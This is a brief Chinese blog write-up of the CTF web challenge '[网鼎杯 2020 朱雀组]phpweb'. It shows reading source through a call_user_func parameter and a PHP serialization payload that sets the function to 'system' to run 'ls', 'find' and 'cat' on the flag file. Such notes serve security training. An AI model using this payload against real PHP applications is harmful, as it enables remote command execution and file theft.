刷题笔记:[网鼎杯 2020 朱雀组]phpweb

CTF Web PHP代码审计反序列化

Web

发布日期: 2020-09-18

更新日期: 2022-01-28

文章字数: 83

阅读时长: 1 分

前言

以前做的题

题解

猜测使用了call_user_func()

$result = call_user_func($func, $p);
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

读取源码func=file_get_contents&p=index.php

反序列化可行

<?php

class Test
{
    var $p = "/flag.php";
    var $func = "readfile";
}

$a = new Test();
echo serialize($a);

#$a->p = 'ls ../../../';
#$a->p ="find / -name 'flag*'";
$a->p = 'cat /tmp/flagoefiu4r93';
$a->func = 'system';

巡璃

https://syunaht.com/p/3140926844.html

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源巡璃 !

CTF Web PHP代码审计反序列化

刷题笔记:[GKCTF2020]老八小超市儿

2020-09-19 Web

CTF Web

刷题笔记:[安洵杯 2019]easy_serialize_php

2020-09-18 Web

CTF Web 反序列化